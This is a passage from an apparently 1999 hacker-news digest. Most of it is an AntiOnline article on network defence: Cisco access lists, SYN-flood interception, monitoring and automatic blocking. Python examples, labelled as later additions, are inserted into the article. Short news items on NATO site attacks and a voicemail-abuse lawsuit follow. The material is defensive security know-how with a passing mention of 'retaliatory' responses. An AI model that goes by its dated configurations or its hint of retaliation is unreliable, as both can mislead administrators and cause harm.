       bandwidth (which meant setting up special arrangements to allow them to be notified 
       if our circuit goes down), and to do all of our own service hosting (which includes 
       e-mail and dns). Our email server sends directly to all remote hosts, instead of
       using our ISP's server as an intermediary.
       
       If I had first choice, I would have gotten a connection directly to the backbone 
       (which you can get from Sprint for about the same as going through an intermediary ISP).
       That would have eliminated an entire network from our loop, but we found that due to our 
       location, that would have been nearly impossible due to the distance that the
       circuit would have had to travel (in other words, T-1s have distance sensitive charges,
       and Bell Atlantic would have socked it to us).
       
        

       Ground Zero (Using Our Router As A First Line Of Defense):
       
       Although it takes security on all levels to ensure a secured lan, this is what I consider 
       to be THE MOST single important security measure that we have in place.
       
        We use a Cisco 2611 router with integrated CSU. We upgraded both the RAM (with an extra
        32 meg DIMM) and the IOS software to 11.3.7(T) Enterprise Plus edition. This allows
        us to implement the newest security features offered by IOS.
       
        Before I go any further, let me give you all a little piece of advice on buying RAM for
        your Cisco router. For THE LOVE OF ALL THAT IS GOOD, do NOT buy your RAM from Cisco. We
        priced a 32 meg DIMM from Cisco at almost $1,000. Through a third-party vendor
        (which was kindly pointed out to us by Corey Gallatin), we paid only $70. The vendor is
        Crucial Technology; they're worth a look (you can get flash memory cheap too).
       
        We use both static and reflexive access lists, as well as TCP Intercept (I'll go more in
        depth about those below). The router can only be accessed via console (which almost
        totally eliminates the fear of someone breaking into the router, which would be a bad
        thing). We also log all denies to a syslog server (I'll talk more about what we do
        with those in my section on network monitoring).
       
        Below is the actual configuration file from our Cisco router (all of the relevant parts of
        it, anyway. I took out things like the interface definitions, routing information,
        encrypted password strings, etc. This is by no means meant to be an example to follow for
        setting up a Cisco configuration file, but mainly to show our use of access lists
        to deny traffic into our internal LAN). We spent a great deal of time auditing our systems
        and determining our risks before creating this file. It's important to have a list of
        all servers and what services they're running. It's also important to have a list of all
        workstations along with a description of how much access each one of them should
        have to the LAN and the Internet. This will make it MUCH easier to come up with your final
        configuration without too much trouble.
       
       Router config file with commentary by JP.
       
       
       !
        Being able to finger current connections to the router is evil.  Disable it.
        no ip finger
        This is the start of the TCP Intercept configuration.  TCP Intercept is a relatively
        new feature of IOS designed to stop SYN floods.  In intercept mode the router answers every
        incoming SYN itself, finishes the three-way handshake with the client, and only then opens
        the connection to the real server and joins the two halves, so a half-open connection from
        a spoofed source never reaches the server.  The router keeps a table of every connection it
        is managing, complete or half-open; once the number of half-open connections crosses the
        high thresholds below it goes into aggressive mode and drops the oldest half-open entries
        until the count falls back under the low thresholds.  connection-timeout is how many seconds
        an idle established connection stays in that table.  The table lives in RAM, which is why
        we upgraded it.
       ip tcp intercept list 199
       ip tcp intercept connection-timeout 7200
       ip tcp intercept max-incomplete low 100
       ip tcp intercept max-incomplete high 550
       ip tcp intercept one-minute low 100
       ip tcp intercept one-minute high 550
       End of tcp intercept configuration, with the exception of the access-list, which is below
       !
       I took out all of the interface configurations with the exception of the one below, simply 
       because they're not relevant.
       interface Serial0/0.112 multipoint
       We'll set up both an incoming and outgoing access list.
        ip access-group reflexin in
        ip access-group reflexout out
        no ip unreachables
        no ip route-cache
        no ip mroute-cache
       That's all of the relevant configurations in this interface.
       !
       Here's our access list for all incoming traffic
       ip access-list extended reflexin
        deny   ip any host 208.195.220.45 log-input
        deny   ip any host 209.166.177.33 log-input
        deny   ip host 209.166.177.35 host 209.166.177.35 log-input
        deny   ip host 209.166.177.36 host 209.166.177.36 log-input
        deny   ip host 209.166.177.37 host 209.166.177.37 log-input
        deny   ip host 209.166.177.38 host 209.166.177.38 log-input
        deny   ip host 209.166.177.42 host 209.166.177.42 log-input
        deny   ip host 209.166.177.50 host 209.166.177.50 log-input
        deny   ip host 209.166.177.51 host 209.166.177.51 log-input
        deny   ip host 209.166.177.52 host 209.166.177.52 log-input
        deny   ip host 209.166.177.55 host 209.166.177.55 log-input
        evaluate alliptraffic 
        permit udp any host 209.166.177.35 eq domain log-input
        permit udp any host 209.166.177.36 eq domain log-input
        permit tcp any host 209.166.177.36 eq smtp log-input
        permit tcp any host 209.166.177.36 eq pop3 log-input
        permit tcp any host 209.166.177.37 eq www log-input
        permit tcp any host 209.166.177.38 eq www log-input
        permit tcp any host 209.166.177.42 eq www log-input
        permit tcp any host 209.166.177.50 eq www log-input
        permit tcp any host 209.166.177.51 eq www log-input
        permit tcp any host 209.166.177.52 eq www log-input
        permit tcp any host 209.166.177.55 eq www log-input
        deny   tcp any any lt 1024 log-input
        deny   tcp any any gt 1023 log-input
        deny   udp any any lt 1024 log-input
        deny   udp any any gt 1023 log-input
        Here's our access list for all outgoing traffic.
       ip access-list extended reflexout
       permit ip any any reflect alliptraffic
       Here's the access list for tcp intercept
       access-list 199 permit tcp any 209.166.177.0 0.0.0.255
       !
       logging buffered 4096 informational
        We send all logs to our syslogd located on one of our monitoring stations.
       logging 209.166.177.42
       !
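        To see what the reflexin list above actually does to a packet, here is a first-match walk
        of it in Python. This is an added example, not part of the original article and not IOS
        code: it models the top-to-bottom evaluation of the inbound list, including the
        "evaluate alliptraffic" entry, which consults the temporary mirror-image entries that the
        outbound "reflect" statement creates. The two "deny ip any host X" lines drop everything
        addressed to those two hosts, and each "deny ip host X host X" line drops a packet whose
        source is the very server it is addressed to (the "land" pattern). The addresses come from
        the configuration above; the packets are constructed for the example.

```python
"""First-match walk of the 'reflexin' inbound list printed above.

Added example, not part of the original article and not IOS code.  Addresses
come from the configuration above; the packets are constructed for the example.
"""
from dataclasses import dataclass

# Services the list permits inbound: udp/53 on .35 and .36, tcp/25 and
# tcp/110 on .36, tcp/80 on the seven web servers.
SERVICES = {
    ("209.166.177.35", "udp", 53), ("209.166.177.36", "udp", 53),
    ("209.166.177.36", "tcp", 25), ("209.166.177.36", "tcp", 110),
}
for last in ("37", "38", "42", "50", "51", "52", "55"):
    SERVICES.add(("209.166.177." + last, "tcp", 80))

# 'deny ip any host X': nothing at all is accepted for these two addresses.
BLACKHOLE = {"208.195.220.45", "209.166.177.33"}
# 'deny ip host X host X': a packet whose source is the very server it is
# addressed to (the 'land' pattern) is dropped before any permit is reached.
LAND_HOSTS = {"209.166.177." + last
              for last in ("35", "36", "37", "38", "42", "50", "51", "52", "55")}


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str       # "tcp", "udp", "icmp", ...
    sport: int = 0   # 0 for protocols without ports
    dport: int = 0


class ReflexiveAcl:
    def __init__(self):
        # mirror-image entries created by outbound traffic:
        # (inside host, proto, inside port, outside host, outside port)
        self.reflected = set()

    def outbound(self, pkt):
        """'permit ip any any reflect alliptraffic': let it out and remember it."""
        self.reflected.add((pkt.src, pkt.proto, pkt.sport, pkt.dst, pkt.dport))
        return "permit"

    def inbound(self, pkt):
        """Return (action, matching entry, logged?) for a packet arriving from the ISP."""
        if pkt.dst in BLACKHOLE:
            return ("deny", "blackhole", True)
        if pkt.src == pkt.dst and pkt.dst in LAND_HOSTS:
            return ("deny", "land", True)
        # 'evaluate alliptraffic': replies to connections we opened ourselves
        if (pkt.dst, pkt.proto, pkt.dport, pkt.src, pkt.sport) in self.reflected:
            return ("permit", "reflexive", False)
        if (pkt.dst, pkt.proto, pkt.dport) in SERVICES:
            return ("permit", "service", True)
        # the four trailing denies cover every TCP and UDP port (lt 1024 + gt 1023)
        if pkt.proto in ("tcp", "udp"):
            return ("deny", "explicit", True)
        # everything else falls off the end: the implicit deny drops it silently
        return ("deny", "implicit", False)


if __name__ == "__main__":
    acl = ReflexiveAcl()
    acl.outbound(Packet("209.166.177.42", "192.0.2.10", "tcp", 40000, 80))
    for p in (Packet("192.0.2.10", "209.166.177.42", "tcp", 80, 40000),   # reply we asked for
              Packet("198.51.100.7", "209.166.177.37", "tcp", 2048, 80),  # visitor to a web server
              Packet("198.51.100.7", "209.166.177.36", "tcp", 2049, 22),  # ssh to the mail host
              Packet("209.166.177.36", "209.166.177.36", "tcp", 25, 25),  # 'land' packet
              Packet("198.51.100.7", "209.166.177.42", "icmp")):          # unsolicited ping
        print(p.src, "->", p.dst, p.proto, p.dport, acl.inbound(p))
```

        Two things the walk makes visible. A reflexive entry only ever opens the exact mirror of
        what went out, so a protocol that negotiates a second channel (active-mode FTP, where the
        server connects back from port 20) is denied and logged like any other probe. And ICMP
        that is not a reply to something we sent never hits a logged entry: it falls off the end of
        the list and is dropped without a syslog line, so if you want to see those probes you need
        an explicit "deny icmp any any log-input" ahead of the implicit deny.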
       
              
       There's No Place Like Home (Our desktops, or a battle ground?):
       
       Oook, now starts the fun stuff. Workstation and Server security.
       
        There's a well-known phrase in the security field which goes something like
        "If you have physical access, you have administrative access", meaning that
        there are several ways to gain access to a machine if you're sitting in front
        of it. We do several things to help prevent this. For starters, head into the
        BIOS and turn off booting from floppy or CD. Common sense, but there are
        many a high school admin who's been burned by a 7th grader by not doing this.
        Our servers all have locking cases (which require a key to open), and some
        use fingerprint recognition units to allow us quick and secure access to them
        (without having to remember a long password which changes regularly. Stop the
        stickies!).
       
       My personal workstation has a MaxLock hardware encryption device installed, 
       which dynamically triple DES encrypts and decrypts all data on the hard drive.
       
        Now, with the exception of my personal machine, it would be possible for, say,
        a governmental organization to come in here with a warrant, confiscate all of
        our equipment, and take the data right off of it (with the exception of my machine,
        which has the dynamic hardware encryption). I'll be the first to admit that having
        locked cases with biometric units attached would do little good to prevent this.
        However, all important data is stored on removable units, which are all sufficiently
        encrypted. Our main concern is not government intervention, but rather
        some third party breaking in and running off with equipment (which is why we have
        an extensive physical security system in place).
       
       To take care of network oriented intrusions on the servers:
       
       We use Memco's "Secured" (for solaris), which is an incredible product that all but
       eliminates the possibility of buffer overflow or root attacks.
       
       We also run ISS's "RealSecure Agent For NT" (see my chapter on network security for 
       more information on RealSecure).
       
       NT based servers and workstations use Norton AntiVirus (I would highly recommend 
       Norton System Works by Symantec for a low cost set of utilities for win based
       systems).
       
       Of course, we use PGP for encrypted e-mail communications.
       
        Keep in mind those are used on top of standard security measures, such as ensuring
        that we're never running a service that has known vulnerabilities, using strong
        passwords that are changed on a regular basis, etc.
       

       Watching Our Network (Highways have patrolmen and so does AntiOnline's network):

       We do a LOT of network monitoring. I'm not going to go into the boring details of 
       EVERYTHING that we do, but here's a look at some of the more important things.
       
        To keep an eye on data running over our network, we primarily use ISS's RealSecure.
        I can't speak highly enough of this program. It watches the network for certain
        attack signatures, and can do several things when it finds them. First, we have it
        notify a console on one of the monitoring stations, then kill the remote connection
        to our network where the attack is coming from, update our "hack attempts" page on
        AntiOnline, and log everything into a database (this database will be used to
        dynamically put deny statements into our router to firewall trouble users off of
        our LAN once and for all). The console monitoring and connection kill are built-in
        features of RealSecure; everything else is done via proprietary actions that we
        programmed on our own (RealSecure will pass parameters to external programs on an
        event, if you choose to have it do so). RealSecure also has agents which can sit on a
        server and watch it, sending information back to the console machine, although we
        currently only have this implemented on one of our servers for test purposes.
       
        Now, there is one problem that could arise by using RealSecure. Obviously, what it's
        doing is throwing the interface card into promiscuous mode and sniffing the network.
        This works just fine if you're using a standard hub, but if you're using a
        switched hub (which keeps each port from seeing the other ports' traffic, which is a
        good thing), RealSecure will not be able to monitor the network, which means that it
        won't be able to detect attacks (other than attacks reported to it by agents which sit
        on the server machines). So, what we did was get an HP switch, which allows switching
        on every port except a "master port" which can be configured to receive all data. So,
        the only machine on our network which can sniff is the network monitoring station.
        Another alternative to this would be to set up a sort of switch DMZ (de-militarized
        zone), where the data coming in from your router would go to a primary un-switched hub,
        which your network monitoring stations would run off of, then going into a second,
        switched hub, that the rest of your network would run off of. Using the HP
        configurable switch saved us the money and hassle of having to do that.
       
       
       AntiOnline's Hacker Tracker:
       
       AntiOnline's Hacker Tracker is a work in progress for us. It gives me something to 
       do in my spare time, and is forcing me to learn more about programming than I had
       ever wanted to. Heh. Here's a brief overview of this experimental system, as well
       as what I hope it will become in the future:
       
        We pay no attention to most of the attacks against us. The types of attacks which
        appear on our "hack attempts" page are simply sent through an automated system
        which logs them, puts them in the database, etc. Those aren't what we're worried
        about. What we're worried about are the attacks which DON'T fit into the common,
        predefined categories which we have set.
       
        Most intrusion detection products now, including RealSecure, look for "attack signatures".
        This system works great if the hacker is using a KNOWN method of hacking a system.
        However, if the hacker is using a "new method", it's useless. So how do we look
        for something, when we don't really know what we're looking for? Every user that
        makes a connection of any type into our LAN is expected to do certain "normal"
        things. Here's an example:
        
        We can expect a user to connect to www.AntiOnline.com, and shortly thereafter it
        would be "normal" to see a connection from that same host to www.AntiSearch.com,
        or to noc.AntiOnline.com. That is "normal" behavior: a user following links on
        the site, looking at different pages, which may be on different
        servers.
       
       However, suppose we see a user which does something like this:
       
       We see a host connect to www.AntiOnline.com, and then to www.AntiSearch.com. Then, 
       we see the same host connecting to our smtp server. This is NOT "normal" behavior. 
       If the user was simply providing feedback on the visit, it would either be done via
       contact forms on our site (which would be "normal" activity), or we would see a 
       connection to the smtp server from a separate, outside host (which would be 
       indicative of the user sending us an e-mail, which "normally" would be sent to an
       intermediary mail server, which would pass the mail along to us). So, seeing the 
       host connecting to our smtp server directly could mean that they're using a mail 
       client which "direct connects" to our server (which is rare), or they have a mail
       server set up on the same machine that they're surfing from (which is also rare, 
       unless in the case of a shell server, but our page looks sucky in lynx, so that's
       rare too). While what the user is doing may not really be a hack attempt, it is 
       not "normal" activity for our network, so it's flagged for us to look at.
       
        While the above is not something that our system would actually flag for us, it
        should give you an idea of how our system works. We've been working on it for a
        while now, and it continues to grow and evolve as we do. We hope to make it much
        more advanced in the future, by taking data from the thousands of hacks that we
        have on file, and turning it into an actual "artificial intelligence system" which
        can examine behavior in comparison to known attempts on thousands of other sites.
        I'm by no means a great programmer, so maybe in the future we will hook up with
        someone to turn this into something cool.
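        The idea in this section, flagging behaviour that fits no expected pattern rather
        than matching attack signatures, can be shown in a few lines. The block below is an
        added example, not the Hacker Tracker (whose code the article does not show): it
        splits connection records into per-host sessions, collects the set of our services
        each session touched, and flags any session whose combination matches none of a
        handful of "normal" profiles. The profiles, the session window and the connection
        records are all constructed for the example; the browse-then-SMTP host is the case
        the text describes.

```python
"""Flag sessions whose mix of services fits none of the expected profiles.

Added example illustrating the idea in the section above; it is not
AntiOnline's Hacker Tracker.  Profiles, window and records are constructed.
"""
from collections import defaultdict

WINDOW = 1800  # seconds of inactivity that ends a session (assumed value)

# What one outside host is expected to touch, as sets of our services.
NORMAL_PROFILES = [
    {"www.AntiOnline.com", "www.AntiSearch.com", "noc.AntiOnline.com"},  # a visitor following links
    {"dns"},            # a remote resolver querying our name servers
    {"smtp", "dns"},    # a remote mail server looking up our MX and delivering
]


def is_normal(services):
    """A session is normal if everything it touched fits inside one profile."""
    return any(services <= profile for profile in NORMAL_PROFILES)


def sessions(connections, window=WINDOW):
    """Split (timestamp, src_ip, service) records into per-host sessions.

    A session ends when a host is idle for longer than `window`, so a visitor
    who browses today and whose machine relays mail tomorrow is not merged
    into one suspicious-looking record."""
    by_host = defaultdict(list)
    for ts, src, service in sorted(connections):
        by_host[src].append((ts, service))
    result = []
    for src, events in by_host.items():
        current, last_ts = set(), None
        for ts, service in events:
            if last_ts is not None and ts - last_ts > window:
                result.append((src, current))
                current = set()
            current.add(service)
            last_ts = ts
        result.append((src, current))
    return result


def flag_anomalies(connections, window=WINDOW):
    """Return [(src_ip, sorted services)] for every session that fits no profile."""
    return [(src, sorted(svcs))
            for src, svcs in sessions(connections, window) if not is_normal(svcs)]


# Constructed connection records: (epoch seconds, source address, service touched).
SAMPLE = [
    (1000, "10.0.0.1", "www.AntiOnline.com"),
    (1012, "10.0.0.1", "www.AntiSearch.com"),
    (1030, "10.0.0.1", "noc.AntiOnline.com"),   # ordinary browsing
    (2000, "10.0.0.2", "www.AntiOnline.com"),
    (2009, "10.0.0.2", "www.AntiSearch.com"),
    (2020, "10.0.0.2", "smtp"),                 # browsing, then straight to our SMTP server
    (3000, "10.0.0.3", "dns"),
    (3001, "10.0.0.3", "smtp"),                 # a mail server: MX lookup, then delivery
    (4000, "10.0.0.4", "www.AntiOnline.com"),
    (4000 + 86400, "10.0.0.4", "smtp"),         # same address a day later: a separate session
]

if __name__ == "__main__":
    for src, svcs in flag_anomalies(SAMPLE):
        print("flag %s: %s" % (src, ", ".join(svcs)))
```

        Only 10.0.0.2 is reported. The session split is what keeps the approach honest: without
        it, every dial-up address that is reused by a different person the next day would pile
        up a mix of services no single visitor would produce.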
       
       Our Router:
       
        On top of using a network monitoring station, we also have our router send logs
        of every "deny" and every "allow" initiated by the access lists to a network
        monitoring station. These logs are parsed by a proprietary program
        that we wrote, and sent into a MiniSQL database. Syslogs from some servers are
        passed to this machine as well, and processes on the servers are matched against the
        connections coming through the router (you can find out ALL SORTS of interesting things
        by doing this). Having all of this data archived and put into a database will
        allow us to use it in other, more advanced applications in the future.
       

       OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up
       for ourselves!):
       
        Many people have asked us what we "do" with the logs of hack attempts against us
        that we see on a daily basis. Well, unlike many organizations, where hack attempts
        are viewed as "events" which are to be "looked into", hack attempts against
        AntiOnline are the rule, not the exception. As a policy, we do not "turn over" any
        hack attempts for investigation by any governmental authorities, nor would we do
        so if a hacker actually managed to gain access to one of our systems. Due to the
        type of organization that we are, we feel that would be hypocritical. We feel that
        the important thing for us to do is "secure" our network, because trying to intimidate
        people from attempting to hack us for fear of prosecution is ridiculous (something
        which sounds like common sense, but our government is just now realizing the
        significance of it).
       
       We may do several things with users that make "hack attempts" against us. First off, 
       it's logged and sent to our database. We identify trouble users, and "take action" as
       we see fit. A few examples of what we may do:
       
        On common hack attempts, the user's IP address or domain is dynamically posted on our
        "hack attempts" page, along with the type of attack the user tried.
       
       We set up a host_deny list for apache using mod_rewrite (Very cool stuff. If you're not
       familiar with mod_rewrite, I strongly suggest looking into it. We use it extensively.),
       which allows us, or our system, to add ip entries, causing the user to get a 403 access 
       forbidden when attempting to visit the page.
       
       If the "user" has done several hack attempts against us, the system may escalate the 
       attempt, and actually set up a deny statement in our router, which stops the host
       from even passing data into our lan.
       
       Our mail server uses the MAPS (Mail Abuse Prevention System) Real Time Black Hole List,
       to prevent spam. Any spammers that we observe are submitted to the list as well.
       
       There are several other responses that we are currently experimenting with, including 
       the ever controversial "retaliatory" ones (don't try that one at home kids).
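        The two pieces of automation described above, parsing the router's access-list
        syslog into per-source counts ("Our Router") and escalating a repeat offender to an
        Apache deny entry or a router deny statement, fit in one small program. The block
        below is an added example, not the proprietary parser the article mentions. The
        log lines are constructed in the shape IOS uses for "log-input" messages (assumed,
        including the prefix a syslog collector prepends); the thresholds and the exempt
        network are hypothetical.

```python
"""Router access-list logs -> per-source deny counts -> escalation entries.

Added example, not the proprietary parser the article mentions.  The log
lines are constructed in the assumed shape of IOS 'log-input' messages;
thresholds and the exempt network are hypothetical.
"""
import ipaddress
import re
from collections import Counter

LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>tcp|udp) (?P<src>[\d.]+)\((?P<sport>\d+)\) "
    r"\((?P<iface>\S+) ?(?P<mac>[0-9a-fA-F.]+)?\) -> "
    r"(?P<dst>[\d.]+)\((?P<dport>\d+)\), (?P<count>\d+) packets?"
)


def parse(line):
    """Return a dict for a TCP/UDP access-list message, None for anything else."""
    m = LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("sport", "dport", "count"):
        rec[key] = int(rec[key])
    return rec


def denied_packets_by_source(lines):
    """Sum denied packets per source address.

    IOS logs the first match immediately and then only a summary ('N packets')
    for the following interval, so add up the packet counts, not the lines."""
    totals = Counter()
    for line in lines:
        rec = parse(line)
        if rec and rec["action"] == "denied":
            totals[rec["src"]] += rec["count"]
    return totals


APACHE_DENY_AT = 5     # hypothetical thresholds
ROUTER_DENY_AT = 50
# Never auto-deny our own block: the source address in a log line is only what
# the packet claimed, and a spoofed one must not be able to cut off our own hosts.
NEVER_DENY = [ipaddress.ip_network("209.166.177.0/24")]


def escalate(totals):
    """Map each source to 'router' or 'apache'; sources below threshold or exempt are omitted."""
    actions = {}
    for src, n in totals.items():
        if any(ipaddress.ip_address(src) in net for net in NEVER_DENY):
            continue
        if n >= ROUTER_DENY_AT:
            actions[src] = "router"
        elif n >= APACHE_DENY_AT:
            actions[src] = "apache"
    return actions


def apache_map_line(src):
    """One entry for a txt RewriteMap that a RewriteRule turns into a 403."""
    return "%s deny" % src


def ios_deny_line(src):
    """Entry to insert at the top of 'ip access-list extended reflexin'."""
    return " deny   ip host %s any log-input" % src


# Constructed log lines; outside sources use the documentation address ranges.
SAMPLE_LOG = [
    "Apr  1 03:14:15 gw 44: %SEC-6-IPACCESSLOGP: list reflexin denied tcp 203.0.113.9(31337) (Serial0/0.112 ) -> 209.166.177.36(23), 1 packet",
    "Apr  1 03:19:16 gw 45: %SEC-6-IPACCESSLOGP: list reflexin denied tcp 203.0.113.9(31337) (Serial0/0.112 ) -> 209.166.177.36(23), 57 packets",
    "Apr  1 03:20:02 gw 46: %SEC-6-IPACCESSLOGP: list reflexin denied udp 198.51.100.23(1025) (Serial0/0.112 ) -> 209.166.177.37(111), 1 packet",
    "Apr  1 03:25:03 gw 47: %SEC-6-IPACCESSLOGP: list reflexin denied udp 198.51.100.23(1025) (Serial0/0.112 ) -> 209.166.177.37(111), 5 packets",
    "Apr  1 03:26:00 gw 48: %SEC-6-IPACCESSLOGP: list reflexin permitted tcp 192.0.2.77(2048) (Serial0/0.112 ) -> 209.166.177.37(80), 1 packet",
    "Apr  1 03:27:00 gw 49: %SEC-6-IPACCESSLOGP: list reflexin denied tcp 192.0.2.77(4000) (Serial0/0.112 ) -> 209.166.177.50(22), 2 packets",
    "Apr  1 03:28:00 gw 50: %SEC-6-IPACCESSLOGP: list reflexin denied tcp 209.166.177.36(25) (Serial0/0.112 ) -> 209.166.177.36(25), 100 packets",
    "Apr  1 03:29:00 gw 51: %SEC-6-IPACCESSLOGDP: list reflexin denied icmp 192.0.2.5 (Serial0/0.112 ) -> 209.166.177.42 (8/0), 1 packet",
]

if __name__ == "__main__":
    for src, action in escalate(denied_packets_by_source(SAMPLE_LOG)).items():
        print(action, ios_deny_line(src) if action == "router" else apache_map_line(src))
```

        On the Apache side the map file is consulted with a "RewriteMap hostdeny txt:..."
        declaration, a RewriteCond on "${hostdeny:%{REMOTE_ADDR}|ok}" equal to "deny", and a
        RewriteRule ending in [F], which is how the 403 in the text is produced. The exempt list
        matters for any automatic block driven by router logs: a bare SYN or a UDP datagram needs
        no handshake, so anyone can get a third party's address into your deny list by spoofing
        it, and entries created this way should also expire rather than accumulate forever.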
              
       Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?)

       One of the things that we spend a lot of time and resources on is gathering "intelligence".
       Finding out about the latest discovered vulnerabilities is something nearly every
       responsible administrator does, and is something that nearly every responsible security 
       administrator is obsessed with. But, we take things one step further.
       
       Not only do we try to keep up with the latest exploits and vulnerabilities, we also try to
       keep up with the latest THREATS. Exploits are no danger to a system at all, if there's no
       one trying to use them against you. But, as with many networks, there never seems to be a
       limited supply of people willing to use those exploits against us. So, one of the things 
       that we do (and dedicate a lot of resources to), is gathering intelligence. 
       
       What are the active hack groups? Who's in those groups? What groups were those people in 
       before this one? What exploits were used? What are their motives? What are they saying to 
       other hack groups? What sites have they hit? What domains do they have access to? So on and 
       so on. Although we realize there is no way to determine every possible person out there who 
       may get the whim one evening to attempt a serious hack, we have found in the past being able
       to do such a "risk assessment" has allowed us to deflect many serious hack attempts against 
       us (now, to be perfectly honest, this information also helps in our news coverage of hacks,
       etc. and also provides us with some VERY interesting research data for use with our 
       experimental Hacker Tracker).
       
       On top of that, we do a lot of the standard "vulnerability and exploit" monitoring as well.
       Keeping up with BugTraq, NT BugTraq, RootShell, CERT (which is a great way to learn about 
       vulnerabilities which were discovered a few months ago, hah), as well as a slew of hacker 
       mail-lists, zines, news groups, and IRC.
       
        

       Great, We're Finally Secure (No we're not.)
       
       I'm going to end this little ditty with a phrase that I use often, and always try to keep in mind:
       
       "Securing A Network Is A Process, Not An Event"
       
       If you've gotten nothing else out of this report, I hope that you remember that one sentence. It's 
       the best piece of advice that any security guru could give you. Let me use the following analogy:
       
       You work hard, save your money, and establish your credit. Finally, you're able to build that 
       special house that you've always dreamed of. You get the best architect to draw the blueprints,
       and hire the best contractors to build it. You even have a landscaper come in to put on the finishing
       touches.
       
        Now, your house is finished and flawless. However, does that mean that you're never going to have to
        work on it again? Your home takes constant care. Washing, cleaning, and yard work on a regular basis
        to maintain it. New carpet, roofing, and paint every few years to keep your house in perfect order.
       
        Think right now, what your house would look like if you just "left it". Soon the dust bunnies would
        move in, followed by that "I went on vacation in the summer and the house was closed up for a week
        and a half" smell, and the ever so shameful "I went to pour milk on my cereal and it came out of the
        carton in lumps". After a while, you would start noticing water from the ceiling dripping onto your
        carpet during a rain, and the mushrooms and other fungus would begin growing off of those dust bunnies
        which are now the size of elephants. Not a pretty sight, is it?
       
        Unfortunately, many system admins don't look at their network the same as they would their new house.
        After the contractors leave, they simply lay back and enjoy. Sure, it looks and works great at first.
        The office has that "there are thousands of dollars of brand spankin' new technology in here" smell
        (come on, all you techies know the one), and you're sitting pretty high on your new office chair
        (the kind that has a lever on the side that lets you drop your seat to its lowest position at the
        end of the day, swing yourself out from under the desk, and that remains spinning for at least three
        minutes after you've gotten into your car).
        
        But soon, the hub's collision lights start going on more and more frequently, the chair refuses to go
        in the up position until you get off of it, and your wrists are no longer positioned at that perfect
        "I hope I don't get the syndrome" position.
       
       You get the idea.
       
       
       @HWA
       
  22.0 NATO fights Serbs online.
       ~~~~~~~~~~~~~~~~~~~~~~~~~
       From PCWorld
       http://www.pcworld.com/pcwtoday/article/0,1510,10391,00.html
       
       
       NATO Fights Serbs Online
       
       Military headquarters shores up Web site against Serbian hacker attacks.
       by Elizabeth de Bony, IDG News Service April 2, 1999, 5:03 p.m. PT
                                
       The North Atlantic Treaty Organization has started defensive measures to
       protect its e-mail and Web site systems against a well-prepared propaganda
       campaign launched by Serbian hackers. 
       
       NATO is taking the measures "as soon as possible, but given the size of 
       the problem, it will be difficult," a source at NATO military headquarters
       confirms, declining to provide any details. "These are open systems, and 
       although we do not want to close them to the public, this is an option." 
       
       The disruptions began last weekend, three days after NATO began its bombing
       missions. That afternoon a hacker in Belgrade saturated the NATO site with 
       "ping" bombardment--a tactic in which one computer automatically and 
       repeatedly calls another.
       
       On a daily basis, another Belgrade-based hacker floods NATO's e-mail system 
       with nearly 2000 messages. The e-mail introduces up to five additional 
       computer viruses into the system.
       
        "This is clearly a new element in warfare in the twenty-first century," the
        source says. The risk is that without a rapid solution, the hackers may move
        on to more damaging activities, such as downloading press releases and 
        imagery available on the site, tampering with them, and then releasing them
        as official documents. 
       
       "All of this is well prepared, and part of Milosevic's propaganda war," 
       the source explains.
                
       -=- from C|Net
       
       NATO site, email suffer hacks 
       By Reuters
       Special to CNET News.com
       March 31, 1999, 4:00 p.m. PT 
  
       BRUSSELS--NATO said today that Yugoslav hackers had broken into its Internet
       home page and jammed its email system with 2,000 messages per day.
  
       NATO spokesman Jamie Shea said service on NATO's home page had been "erratic 
       to say the least" since March 28, the fifth day of the alliance's bombing 
       campaign against Yugoslavia. 
  
       "It seems that we have been dealing with some hackers in Belgrade, who have
       hacked into our Web site," Shea told a news conference at NATO headquarters 
       in Brussels. 
  
       "At the same time, our email system has also been saturated by one individual 
       who is currently sending us 2,000 emails a day. We are dealing with macro 
       viruses from Yugoslavia in our email system," he said. 
  
       A senior NATO diplomat said it was clear how well-organized and prepared 
       Belgrade's offensive was: "It ranges all the way from organized ethnic 
       cleansing to messing up our Web site." 
  
       Shea added: "Let me assure you that despite these technical glitches, you will
       continue to receive updated political and operation information from this alliance." 
  
        Story Copyright © 1999 Reuters Limited. All rights reserved. 
  
       http://www.news.com/News/Item/0,4,34508,00.html?owv
       
       
       @HWA       
       
   23.0 Chicago man sues employer over having weak voicemail security.     
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Silicon Valley.com
       http://www.mercurycenter.com/svtech/news/breaking/merc/docs/006063.htm
 
       Posted at 6:53 a.m. PST Friday, April 2, 1999 
 
        Man sues employer over voice-mail abuse
 
       CHICAGO (AP) -- A suburban Chicago man is suing his employer for allegedly failing
       to adequately secure the company voice-mail system, even after he complained that
       someone had hacked into the system and was passing offensive messages about him.
 
       ``I hope that this makes other companies look at their systems and say, 'Gee, could this
       happen with our company?' '' Gary Thompson, 45, said Thursday from his home in
       Wheaton. ``I would be willing to bet most companies haven't even thought about this.''
 
       Thompson, who is suing both Jewel Food Stores and its parent, Utah-based American
       Food Stores Co., claims that on five occasions beginning in 1996, someone posing as a
       private investigator hired by the company left false and defamatory messages in the
       voice-mail boxes of hundreds of American Stores' employees nationwide.
 
       The messages included claims that he had HIV, was a drug user, cheated on his wife with
       company secretaries and stole from the company.
 
       ``I started being treated differently immediately after the first message. Work associates
       stopped shaking my hand,'' said Thompson, who is on disability leave after suffering what 
       he described as severe depression in the wake of the voice-mail attacks.
 
       One day Thompson found a note on the front seat of his car in which the author said they 
       understood he was dying of AIDS and wanted to know how to apply for his reserved parking 
       space.
 
       ``Those kinds of things start to build up and get to you,'' he said. ``No one could know 
       or understand what it's like to be in my shoes.''
 
       While the law has begun to adapt to issues of privacy and copyright infringement relating 
       to the Internet and e-mail, voice mail has produced a similar set of concerns.
 
       ``As technology advances, people are finding new ways of abusing of it,'' said David Loundy,
       a Chicago attorney specializing in technology law.
 
   **  Voice-mail security was at the crux of the dispute last year between Chiquita Brands 
       International and a Cincinnati Enquirer reporter who broke into the company voice-mail system
       to gather information for a story that was highly critical of Chiquita.
 
       The reporter's work was later retracted, and he and a Chiquita employee were prosecuted for 
